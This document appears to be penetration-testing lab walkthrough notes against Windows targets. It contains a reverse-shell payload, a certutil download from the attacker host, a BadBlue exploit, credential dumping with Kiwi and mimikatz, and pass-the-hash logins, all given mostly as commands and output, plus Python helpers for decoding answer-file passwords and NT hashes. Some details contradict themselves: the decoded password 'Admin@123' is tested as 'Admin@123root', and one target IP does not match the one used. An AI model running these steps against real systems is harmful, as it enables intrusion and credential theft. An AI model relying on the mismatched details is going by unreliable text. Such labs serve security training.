- Target IP: `10.4.19.9`
- Searching for passwords in Windows configuration files
- Both the Kali machine and the attacker/victim Windows machine are provided
- On the attacker machine check the current user
- From the Kali machine, generate a `meterpreter` x64 payload

```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > payload.exe
```

- Set up a web server to host the payload

```shell
python -m SimpleHTTPServer 80
```

- Download the payload file on the target system using the `certutil` tool in cmd

```
cd Desktop
certutil -urlcache -f http://10.10.4.2/payload.exe payload.exe
```

- Stop the HTTP server and start `msfconsole` on the Kali machine

```shell
msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 1234
set LHOST 10.10.4.2
run
```

- Execute `payload.exe` on the Windows target system and check the reverse shell on Kali
- Manually search for the `unattend.xml` file; it should be inside `C:\Windows\Panther`

```
cd C:\\Windows\\Panther
dir
download unattend.xml
```

- In a new terminal tab

```shell
cat unattend.xml
```

The `administrator` user's configured base64 password is `QWRtaW5AMTIz`

- Save it to a new file
- Decode it using the `base64` tool

```shell
nano password.txt
# paste the password, save and exit the file
base64 -d password.txt
Admin@123root
# the decoded value has no trailing newline, so the shell prompt ("root...") is printed on the same line
```

- Test the `administrator:Admin@123root` credentials with the `psexec` tool

```shell
psexec.py administrator@10.4.19.9
cd C:\Users\Administrator\Desktop
type flag.txt
```
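The answer-file lookup above, as an added example that is not part of the lab notes: a small auditor that walks an `unattend.xml`, finds every password block and recovers its value, handling both the bare base64 seen in the lab and Microsoft's documented UTF-16LE-plus-suffix encoding. The function names, the constructed sample file and the heuristic that tells the two encodings apart are my assumptions.

```python
import base64
import xml.etree.ElementTree as ET

# Answer-file elements that hold a credential -> suffix Microsoft appends before UTF-16LE + base64
PASSWORD_TAGS = {"AdministratorPassword": "AdministratorPassword", "Password": "Password"}


def _local(tag):  # drop the '{urn:...}' namespace prefix from an element tag
    return tag.rsplit("}", 1)[-1]


def decode_value(value, plaintext, suffix):
    """Recover the password from a <Value>. Documented form is base64(UTF-16LE(pw + suffix));
    stripped-down files like the lab's hold base64 of the bare password instead (assumption)."""
    if plaintext:
        return value
    raw = base64.b64decode(value)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):  # ASCII text in UTF-16LE
        text = raw.decode("utf-16-le")
        return text[: -len(suffix)] if text.endswith(suffix) else text
    return raw.decode("utf-8", errors="replace")


def find_credentials(xml_text):
    """Return [(element, username_or_None, password)] for every password block in the file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in PASSWORD_TAGS:
            continue
        kids = {_local(c.tag): (c.text or "").strip() for c in elem}
        if "Value" not in kids:
            continue
        plain = kids.get("PlainText", "false").lower() == "true"
        password = decode_value(kids["Value"], plain, PASSWORD_TAGS[name])
        # The account name sits beside the password block (AutoLogon/Username, LocalAccount/Name).
        sibs = {_local(c.tag): (c.text or "").strip() for c in parents.get(elem, [])}
        findings.append((name, sibs.get("Username") or sibs.get("Name"), password))
    return findings


# Constructed sample modelled on the lab file: the lab's bare base64 AutoLogon value plus an
# AdministratorPassword in Microsoft's documented UTF-16LE + "AdministratorPassword" form.
_DOC_FORM = base64.b64encode("Admin@123AdministratorPassword".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend"><settings pass="oobeSystem">
<component name="Microsoft-Windows-Shell-Setup">
<AutoLogon><Password><Value>QWRtaW5AMTIz</Value><PlainText>false</PlainText></Password>
<Enabled>true</Enabled><Username>administrator</Username></AutoLogon>
<UserAccounts><AdministratorPassword><Value>{_DOC_FORM}</Value><PlainText>false</PlainText>
</AdministratorPassword></UserAccounts></component></settings></unattend>"""
```

Any non-empty result from `find_credentials` on a leftover `C:\Windows\Panther\unattend.xml` means the answer file should be deleted or scrubbed after deployment.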
🔬 Windows: Meterpreter: Kiwi Extension

- Target IP: `10.2.29.32`
- Dumping password hashes with mimikatz
- Both the Kali machine and the attacker/victim Windows machine are provided

```shell
nmap 10.2.29.32
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
nmap -sV -p 80 10.2.29.32
80/tcp open http BadBlue httpd 2.7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

- 📌 Exploit BadBlue 2.7 with `metasploit`

```shell
msfconsole -q
search badblue
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.29.32
run
sysinfo
getuid
pgrep lsass
migrate 768
```

- In the `meterpreter` session load Kiwi

```
load kiwi
help
```

- Retrieve all credentials

```
creds_all
msv credentials
===============
Username       Domain         NTLM                              SHA1
--------       ------         ----                              ----
Administrator  ATTACKDEFENSE  e3c61a68f1b89ee6c8ba9507378dc88d  fa62275e30d286c09d30d8fece82664eb34323ef

wdigest credentials
===================
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
ATTACKDEFENSE$  WORKGROUP      (null)
Administrator   ATTACKDEFENSE  (null)
# clear-text passwords are not stored on Win2016

kerberos credentials
====================
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
Administrator   ATTACKDEFENSE  (null)
attackdefense$  WORKGROUP      (null)
```

- Dump LSA SAM (NTLM hashes for all users)

```
lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
```

- Dump LSA secrets. This could provide clear-text passwords

```
lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local name : ATTACKDEFENSE ( S-1-5-21-3688751335-3073641799-161370460 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {47980b9c-8bd1-89c9-bfb5-0c4fca25e625}
[00] {47980b9c-8bd1-89c9-bfb5-0c4fca25e625} 247e7be223db5e50291fc0fcec276ff8236c32a8a6183c5a0d0b6b044590ce06
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 34 5e 65 80 f9 04 a4 8c a5 0e 6c 74 6c d2 c3 b8 8e 7a ca c3 a3 3b 0e 6e 0a 64 f3 12 fc c7 92 67 a3 2f d5 d1 e4 41 33 ac
full: 345e6580f904a48ca50e6c746cd2c3b88e7acac3a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
m/u : 345e6580f904a48ca50e6c746cd2c3b88e7acac3 / a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
old/hex : 01 00 00 00 c1 3a 28 e3 94 7b 64 5d 94 29 b4 c9 1c 9b 0c b1 b6 5a aa 2c 34 4d ee ed 86 74 0f 12 25 37 8c 38 69 b3 b4 53 b6 37 86 44
full: c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c344deeed86740f1225378c3869b3b453b6378644
m/u : c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c / 344deeed86740f1225378c3869b3b453b6378644
Secret : NL$KM
cur/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
old/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
```

- Upload `mimikatz.exe` to the target and drop into a shell

```
cd C:\\
mkdir Temp
cd Temp
meterpreter > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
```

- Run `mimikatz.exe`

```
mimikatz.exe
privilege::debug
Privilege '20' OK
# I have the required privileges for hash extraction from memory
```

- Dump the SAM hashes and the LSA secrets with the `lsadump` module (these come from the registry hives, not from the `lsass` process memory)

```
lsadump::sam
lsadump::secrets
```

- Display logon passwords, when stored in clear-text (in this case clear-text passwords are disabled, so the output is `(null)`)

```
sekurlsa::logonPasswords
```

Reveal Flag - Administrator NTLM Hash is: 🚩 `e3c61a68f1b89ee6c8ba9507378dc88d`
Reveal Flag - Student NTLM Hash is: 🚩 `bd4ca1fbe028f3c5066467a7f6a73b0b`
Reveal Flag - SysKey is: 🚩 `377af0de68bdc918d22c57a263d38326`
🔬 Windows: Meterpreter: Kiwi Extension - same lab as Lab 2

- Target IP changed: `10.2.29.32`
- Use a pass-the-hash attack
- Both the Kali machine and the attacker/victim Windows machine are provided

```shell
nmap 10.2.23.202
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
nmap -sV -p 80 10.2.23.202
80/tcp open http BadBlue httpd 2.7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

- 📌 Exploit BadBlue 2.7 with `metasploit`

```shell
msfconsole -q
search badblue
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.23.202
run
pgrep lsass
migrate 772
getuid
Server username: NT AUTHORITY\SYSTEM
load kiwi
lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
```

- 📌 Save the users' NTLM hashes in a text file for future use

```
Administrator: e3c61a68f1b89ee6c8ba9507378dc88d
student: bd4ca1fbe028f3c5066467a7f6a73b0b
```

- `hashdump` prints the same data in `user:RID:LM hash:NTLM hash:::` format

```
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
```

- The LM+NTLM hash is necessary, so copy the string: `aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d`
- Use PSExec to log in with the `Administrator` user and its password hashes

```shell
background
search psexec
use exploit/windows/smb/psexec
options
sessions
# change Payload options
set LPORT 4422
set RHOSTS 10.2.23.202
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
# set target Native\ upload
exploit
getuid
sysinfo
```

- The same NTLM hash also works with `crackmapexec`

```shell
crackmapexec smb 10.2.23.202 -u Administrator -H "e3c61a68f1b89ee6c8ba9507378dc88d" -x "whoami"
```
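As an added example that is not part of the lab, the hash format behind the pass-the-hash step above: `nt_hash` rebuilds an NT hash as MD4 over the UTF-16LE password, which is why a dumped hash can be replayed unsalted, and `triage_hashdump` parses `hashdump` output into the `LM:NT` string that `SMBPass` expects while flagging the accounts a defender should disable first (`Guest` and `DefaultAccount` carry the NT hash of an empty password). The function names and the pure-Python MD4 are mine; the sample lines are the lab's own hashdump output.

```python
import struct

MASK = 0xFFFFFFFF

def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rol = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # round-3 word order
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[i % 4 * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = [(s + t) & MASK for s, t in zip((a0, b0, c0, d0), (a, b, c, d))]
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)): unsalted, so a dumped hash is directly replayable."""
    return md4(password.encode("utf-16-le")).hex()

EMPTY_NT = nt_hash("")  # NT hash of an empty password

def triage_hashdump(dump):
    """Parse `hashdump` lines (user:rid:lm:nt:::) into {user: {rid, lm_nt, blank_password, builtin_admin}}."""
    out = {}
    for line in dump.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        out[user] = {"rid": int(rid), "lm_nt": f"{lm}:{nt}",  # LM:NT form that psexec's SMBPass expects
                     "blank_password": nt.lower() == EMPTY_NT, "builtin_admin": int(rid) == 500}
    return out

# Sample input copied from the lab's hashdump output above.
SAMPLE_DUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::"""
```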